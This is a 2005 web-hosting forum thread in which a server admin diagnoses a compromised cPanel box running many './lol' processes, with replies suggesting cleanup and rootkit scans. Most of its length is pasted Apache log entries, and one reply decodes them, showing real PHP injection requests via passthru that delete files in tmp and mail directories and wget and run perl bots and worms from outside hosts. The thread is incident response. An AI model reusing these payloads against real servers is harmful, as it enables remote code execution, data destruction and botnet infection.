Results 1 to 11 of 11
Thread: Process running as nobody
-
01-12-2005, 08:16 AM #1Web Hosting Guru
- Join Date
- Sep 2003
- Location
- UK
- Posts
- 345
Process running as nobody
Hi all,
Below is a copy of my top
Code:12:14:26 up 50 days, 59 min, 1 user, load average: 0.39, 0.42, 0.59 257 processes: 252 sleeping, 1 running, 0 zombie, 4 stopped CPU states: 15.2% user 5.5% system 0.0% nice 0.0% iowait 79.1% idle Mem: 514196k av, 502628k used, 11568k free, 0k shrd, 112768k buff 156332k active, 310968k inactive Swap: 2104504k av, 196156k used, 1908348k free 145632k cached PID USER PRI NI SIZE RSS SHARE STAT %CPU %MEM TIME CPU COMMAND 2465 root 19 0 1184 1184 804 R 5.5 0.2 0:01 0 top 31482 nobody 10 0 608 604 548 S 1.3 0.1 0:10 0 ./lol 30 1089 root 19 19 33184 13M 10400 S N 0.9 2.7 1646m 0 ./server_linux -PID=tsserver2.pid 28521 nobody 10 0 576 572 516 S 0.9 0.1 0:05 0 ./lol 30 28523 nobody 10 0 576 572 516 S 0.9 0.1 0:05 0 ./lol 30 19621 nobody 9 0 620 616 560 S 0.4 0.1 0:13 0 ./lol 30 20010 nobody 9 0 620 616 560 S 0.4 0.1 0:13 0 ./lol 30 20014 nobody 9 0 620 616 560 S 0.4 0.1 0:13 0 ./lol 30 20028 nobody 9 0 620 616 560 S 0.4 0.1 0:13 0 ./lol 30 20469 nobody 9 0 620 616 560 S 0.4 0.1 0:12 0 ./lol 30 20610 nobody 9 0 620 616 560 S 0.4 0.1 0:12 0 ./lol 30 22113 nobody 9 0 612 608 552 S 0.4 0.1 0:11 0 ./lol 30 23021 nobody 9 0 608 604 548 S 0.4 0.1 0:10 0 ./lol 30 23096 nobody 9 0 604 600 544 S 0.4 0.1 0:10 0 ./lol 30 23497 nobody 9 0 604 600 544 S 0.4 0.1 0:09 0 ./lol 30 23506 nobody 9 0 604 600 544 S 0.4 0.1 0:09 0 ./lol 30 24227 nobody 9 0 604 600 544 S 0.4 0.1 0:09 0 ./lol 30 24229 nobody 9 0 600 596 540 S 0.4 0.1 0:09 0 ./lol 30 25163 nobody 9 0 596 592 536 S 0.4 0.1 0:08 0 ./lol 30 26179 nobody 9 0 584 580 524 S 0.4 0.1 0:07 0 ./lol 30 26561 nobody 9 0 584 580 524 S 0.4 0.1 0:06 0 ./lol 30 27201 nobody 9 0 580 576 520 S 0.4 0.1 0:06 0 ./lol 30 28045 nobody 9 0 576 572 516 S 0.4 0.1 0:06 0 ./lol 30 28381 nobody 9 0 576 572 516 S 0.4 0.1 0:05 0 ./lol 30 28529 nobody 9 0 528 524 464 S 0.4 0.1 0:08 0 ./lol 30 28634 nobody 9 0 524 520 460 S 0.4 0.1 0:08 0 ./lol 30 28860 nobody 9 0 524 520 460 S 0.4 0.1 0:08 0 ./lol 30 30670 nobody 9 0 544 540 484 S 0.4 0.1 0:01 0 ./lol 30 31106 nobody 9 0 612 608 552 S 0.4 0.1 0:11 0 ./lol 30 31254 nobody 9 0 608 604 548 S 0.4 0.1 0:11 0 ./lol 30 1 root 8 0 472 440 424 S 0.0 0.0 0:58 0 init [3] 2 root 9 0 0 0 0 SW 0.0 0.0 0:01 0 keventd 3 root 9 0 0 0 0 SW 0.0 0.0 2:32 0 kapmd 4 root 19 19 0 0 0 SWN 0.0 0.0 0:00 0 ksoftirqd_CPU0 5 root 9 0 0 0 0 SW 0.0 0.0 7:31 0 kswapd 6 root 9 0 0 0 0 SW 0.0 0.0 0:00 0 bdflush 7 root 9 0 0 0 0 SW 0.0 0.0 2:02 0 kupdated 8 root 18446744073709551615 -20 0 0 0 SW< 0.0 0.0 0:00 0 mdrecoveryd 58 root 9 0 0 0 0 SW 0.0 0.0 0:00 0 khubd 277 root 9 0 0 0 0 SW 0.0 0.0 0:00 0 kjournald 278 root 9 0 0 0 0 SW 0.0 0.0 4:17 0 kjournald 279 root 9 0 0 0 0 SW 0.0 0.0 1:25 0 kjournald 280 root 9 0 0 0 0 SW 0.0 0.0 6:15 0 kjournald 281 root 9 0 0 0 0 SW 0.0 0.0 3:22 0 kjournald 750 root 9 0 556 520 476 S 0.0 0.1 3:41 0 syslogd -m 0 754 root 9 0 420 368 368 S 0.0 0.0 0:00 0 klogd -x 4411 root 9 0 984 776 776 S 0.0 0.1 0:00 0 /bin/bash 4414 root 9 0 940 804 788 S 0.0 0.1 0:38 0 /usr/sbin/sshd 4428 root 8 0 752 668 620 S 0.0 0.1 0:04 0 xinetd -stayalive -pidfile /var/run/xinetd.pid 4670 root 8 0 580 568 524 S 0.0 0.1 0:18 0 crond
I have checked /tmp (which is non-executable) /var/tmp (again the same) and have just checked /dev/shm (which isnt non-executable)
I removed a few files from there.
I have tried killing the processes however more seem to appear.
Can anyone help?
ThanksCentation Web Services
Bristol based web design
Offering website design, SEO, website hosting, website development and domain registration.
-
01-12-2005, 08:20 AM #2Web Hosting Master
- Join Date
- Feb 2004
- Posts
- 2,197
Try running:
killall -9 lol
To find the file you can use:
locate lol
You may also want to install and run rkhunter and or chkrootkit.crucialparadigm - Affordable, Reliable, Professional :
Web Hosting
• 24/7 Support • Web Hosting • Reseller Hosting • Cloud/VPS Plans • Dedicated Servers •
-
01-12-2005, 08:39 AM #3Web Hosting Master
- Join Date
- Dec 2004
- Location
- Canada
- Posts
- 1,097
Looks like your box has been exploited.
-
01-12-2005, 08:40 AM #4Web Hosting Master
- Join Date
- Apr 2003
- Location
- UK
- Posts
- 2,569
if i remember correctly, lol is a dosser, and i suspect you'll find your attacker has got in via an insecure webscript (check things like phpbb + coppermine versions).
check /var/tmp and /tmp for directories such as ". . " and the like
-
01-12-2005, 08:51 AM #5Web Hosting Master
- Join Date
- Nov 2004
- Location
- Dallas
- Posts
- 740
Yep, check tmp or kill all processes running on nobody
-
01-12-2005, 11:14 AM #6Web Hosting Guru
- Join Date
- Sep 2003
- Location
- UK
- Posts
- 345
Hi there,
I have run locate lol before however nothing out of the ordinary comes up. Just a lot of .gif files.
Im running updatedb and then gonna try locate again to see if anything new comes up.
I have double checked all directorys and removed some more . folders.
Does anyone have a URL or any more information on the lol dosser, so i can isolate it and prevent it in the future?
//EDIT Just found lots of files in /usr/local/apache/proxy
One dir being Strobe which is a port prober. Also a dir called scan which contains the lol files. Also there is a dir called flood is it safe to remove the dir called flood?
Also does apache need the folder called proxy? If so what folders does it need? There is also httpd -DSSL in it, is that another trick?
ThanksLast edited by Veus; 01-12-2005 at 11:24 AM.
Centation Web Services
Bristol based web design
Offering website design, SEO, website hosting, website development and domain registration.
-
01-12-2005, 11:37 AM #7Web Hosting Master
- Join Date
- Apr 2003
- Location
- UK
- Posts
- 2,569
ye thats a trick, we've seen the same (hackers?) tools on one of our custoemrs servers repeatedly. Out of interest is this a cpanel server?
they used a file called httpd -DSSL as well as various other rubbish renaming methods. Also included were psybncs and bots. Most of their stuff they kept in /tmp and /var/tmp although i did find stuff elsewhere. Try looking in your apache logs for wget
-
01-12-2005, 11:53 AM #8Web Hosting Guru
- Join Date
- Sep 2003
- Location
- UK
- Posts
- 345
Thats the same as what i found, quite a few psybncs and a few bots. Ill have a look thanks.
Yea it is a Cpanel server.
Im running grep - i wget * on my logs now to find which user is being careless!Centation Web Services
Bristol based web design
Offering website design, SEO, website hosting, website development and domain registration.
-
01-12-2005, 12:18 PM #9Web Hosting Master
- Join Date
- Apr 2003
- Location
- UK
- Posts
- 2,569
we found it was an old version of the coppermine gallery software that was causing the problems (they were running 1.2, and 1.3.something is the latest secure ver)
-
01-12-2005, 12:20 PM #10Web Hosting Guru
- Join Date
- Sep 2003
- Location
- UK
- Posts
- 345
After searching for wget in the domlogs i have found the following entries:
Code:/usr/local/apache/domlogs/domain.com:209.126.164.246 - - [01/Jan/2005:21:58:17 +0000] "GET /showthread.php?t=9840&rush=echo%20_START_%3B%20cd%20/tmp;%20rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20/var/tmp/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20/var/spool/mail/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20/var/mail/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20%20/usr/local/apache/proxy/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;killall%20-9%20wget%3B%20echo%20_END_&highlight=%2527.passthru(%24HTTP_GET_VARS%5Brush%5D).%2527 HTTP/1.0" 200 47435 "-" "LWP::Simple/5.43" /usr/local/apache/domlogs/domain.com:70.84.39.148 - - [02/Jan/2005:09:15:23 +0000] "GET /showthread.php?t=8240&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;%20rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20/var/tmp/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20/var/spool/mail/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20/var/mail/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20%20/usr/local/apache/proxy/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527 HTTP/1.1" 200 67361 "-" "LWP::Simple/5.803" /usr/local/apache/domlogs/domain.com:203.24.100.137 - - [02/Jan/2005:11:25:51 +0000] "GET /showthread.php?t=9722&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;%20rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20/var/tmp/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20/var/spool/mail/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20/var/mail/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20%20/usr/local/apache/proxy/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527 HTTP/1.0" 200 73304 "-" "LWP::Simple/5.64" /usr/local/apache/domlogs/domain.com:208.234.15.155 - - [03/Jan/2005:22:47:40 +0000] "GET /printthread.php?t=9849&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;%20rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20/var/tmp/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20/var/spool/mail/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20/var/mail/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20%20/usr/local/apache/proxy/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527 HTTP/1.1" 200 6881 "-" "LWP::Simple/5.63" /usr/local/apache/domlogs/domain.com:193.210.126.79 - - [10/Jan/2005:04:30:31 +0000] "GET /printthread.php?t=440&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;wget%20%0Asecurity.cnc.net/bot.txt;wget%20security.cnc.net/worm.txt;perl%20%0Aworm.txt;rm%20worm.txt;perl%20%0Abot.txt;rm%20%0Abot.txt%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527'; HTTP/1.1" 200 2864 "-" "LWP::Simple/5.79" /usr/local/apache/domlogs/domain.com:209.152.178.80 - - [10/Jan/2005:23:34:51 +0000] "GET /printthread.php?t=471&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;wget%20%0Asecurity.cnc.net/bot.txt;wget%20security.cnc.net/worm.txt;perl%20%0Aworm.txt;rm%20worm.txt;perl%20%0Abot.txt;rm%20%0Abot.txt%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527'; HTTP/1.1" 200 2852 "-" "LWP::Simple/5.63" /usr/local/apache/domlogs/domain.com:209.152.178.80 - - [11/Jan/2005:07:45:01 +0000] "GET /printthread.php?t=440&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;wget%20%0Asecurity.cnc.net/bot.txt;wget%20security.cnc.net/worm.txt;perl%20%0Aworm.txt;rm%20worm.txt;perl%20%0Abot.txt;rm%20%0Abot.txt%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527'; HTTP/1.1" 200 2864 "-" "LWP::Simple/5.63"
Centation Web Services
Bristol based web design
Offering website design, SEO, website hosting, website development and domain registration.
-
01-12-2005, 03:13 PM #11Web Hosting Master
- Join Date
- Jun 2003
- Posts
- 976
Code:GET /showthread.php?t=9840&rush=echo%20_START_%3B%20cd%20/tmp;%20rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20/var/tmp/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20/var/spool/mail/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20/var/mail/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20%20/usr/local/apache/proxy/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;killall%20-9%20wget%3B%20echo%20_END_&highlight=%2527.passthru(%24HTTP_GET_VARS%5Brush%5D).%2527 is GET /showthread.php?t=9840&rush=echo _START_; cd /tmp; rm -rf *;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl sess_189f0f0889555397a4de5485dd611111;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl sess_189f0f0889555397a4de5485dd611116;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl sess_189f0f0889555397a4de5485dd611115;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl sess_189f0f0889555397a4de5485dd611117;rm -rf *;cd /var/tmp/;rm -rf *;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl sess_189f0f0889555397a4de5485dd611111;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl sess_189f0f0889555397a4de5485dd611116;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl sess_189f0f0889555397a4de5485dd611115;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl sess_189f0f0889555397a4de5485dd611117;rm -rf *;cd /var/spool/mail/;rm -rf *;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl sess_189f0f0889555397a4de5485dd611111;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl sess_189f0f0889555397a4de5485dd611116;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl sess_189f0f0889555397a4de5485dd611115;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl sess_189f0f0889555397a4de5485dd611117;rm -rf *;cd /var/mail/;rm -rf *;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl sess_189f0f0889555397a4de5485dd611111;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl sess_189f0f0889555397a4de5485dd611116;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl sess_189f0f0889555397a4de5485dd611115;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl sess_189f0f0889555397a4de5485dd611117;rm -rf *;cd /usr/local/apache/proxy/;rm -rf *;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl sess_189f0f0889555397a4de5485dd611111;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl sess_189f0f0889555397a4de5485dd611116;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl sess_189f0f0889555397a4de5485dd611115;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl sess_189f0f0889555397a4de5485dd611117;rm -rf *;killall -9 wget; echo _END_&highlight=%2527.passthru($HTTP_GET_VARS[rush]).%2527 GET /showthread.php?t=8240&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;%20rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20/var/tmp/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f08895553